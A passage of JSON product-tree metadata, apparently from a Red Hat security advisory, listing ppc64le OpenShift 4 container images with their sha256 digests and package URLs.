"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3Aaee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Aaccb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3Acb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Ae1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3A80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9@sha256%3A6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9-operator@sha256%3A75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3Afdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557766"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3Ab8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3A5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Ac0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3Abb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3Adbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Afdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3Aaff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ab7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Aeab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"product_identification_helper": {
